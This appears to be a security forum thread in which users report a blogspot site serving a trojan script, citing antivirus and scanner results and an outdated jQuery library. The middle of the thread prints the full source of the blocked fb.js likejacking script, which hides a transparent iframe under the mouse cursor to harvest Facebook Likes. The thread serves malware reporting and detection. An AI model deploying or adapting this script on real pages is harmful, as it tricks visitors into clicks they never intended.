Pondus reports a non-detected trojan script malware, missed by Avast's!

Dear Pondus, my good forum friend,

Where: https://www.virustotal.com/en/url/bee37dd9ea7a742eba98d0517b50fffee9a92439c0ffac0b6685dd5ef0347d1b/analysis/
Well detection already there for 2012, so Avast may have forgotten about this one… ;D
Quttera also does not have detection: http://quttera.com/detailed_report/zamovhack.blogspot.mx
We should look at Sucuri’s, they will detect, OK and they have it: https://sitecheck.sucuri.net/results/zamovhack.blogspot.mx
Attached is a tracker tracker report for Pondus, as I think it is adware related…
Soph0s, Bitdefender and Fortinet have it, so it should be alerted on an urlquery dot net scan, let’s see whether there is Google abuse there or is it cause by Adsense Camp code? Consider: -http://kabar.50webs.com/referals-adsensecamp.html
No urlqyery dot net does not flag in any way: https://urlquery.net/report.php?id=1452460699434
but has alerts from that IP for other domains.

And is there code library to be retired at this website, yes there is:
htxp://zamovhack.blogspot.mx
Detected libraries:
jquery - 1.3.2 : -http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Info: Severity: medium
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
1 vulnerable library detected

Damian

Update from Pondus - most recent VT results: https://www.virustotal.com/en/file/fd0036d3fd1c391d27a6236060de1082eec438ac018105076d2a627f2ae0099a/analysis/1452462449/

Avast blocked the script

hxxp://yourjavascript.com/41432912682/fb.js as JS:Autolike-H [Trj]

var fan_page_url=https:var opacity=0.0;var time=20000;if((document.getElementById)&&window.addEventListener||window.attachEvent){(function(){var hairCol="#ff0000";var d=document;var my=-10;var mx=-10;var r;var vert="";var idx=document.getElementsByTagName('div').length;var thehairs="";document.write(thehairs);var like=document.getElementById("theiframe");document.getElementsByTagName('body')[0].appendChild(like);var pix="px";var domWw=(typeof window.innerWidth=="number");var domSy=(typeof window.pageYOffset=="number");if(domWw) r=window;else{if(d.documentElement&&typeof d.documentElement.clientWidth=="number"&&d.documentElement.clientWidth!=0) r=d.documentElement;else{if(d.body&&typeof d.body.clientWidth=="number") r=d.body;}} if(time!=0){setTimeout(function(){document.getElementsByTagName('body')[0].removeChild(like);if(window.addEventListener){document.removeEventListener("mousemove",mouse,false);} else if(window.attachEvent){document.detachEvent("onmousemove",mouse);}},time);} function scrl(yx){var y,x;if(domSy){y=r.pageYOffset;x=r.pageXOffset;} else{y=r.scrollTop;x=r.scrollLeft;} return(yx==0)?y:x;} function mouse(e){var msy=(domSy)?window.pageYOffset:0;if(!e) e=window.event;if(typeof e.pageY=='number'){my=e.pageY- 5- msy;mx=e.pageX- 4;} else{my=e.clientY- 6- msy;mx=e.clientX- 6;} vert.top=my+ scrl(0)+ pix;vert.left=mx+ pix;} function ani(){vert.top=my+ scrl(0)+ pix;setTimeout(ani,300);} function init(){vert=document.getElementById("theiframe").style;ani();} if(window.addEventListener){window.addEventListener("load",init,false);document.addEventListener("mousemove",mouse,false);} else if(window.attachEvent){window.attachEvent("onload",init);document.attachEvent("onmousemove",mouse);}})();}

fb.js

https://www.virustotal.com/en/file/90a35282a0c0711390a056aa53b666935516931299fd6533113d8a026e4e30f2/analysis/1452550638/

Hi jefferson sant,

Thanks for confirming, seems we are being protected.

polonus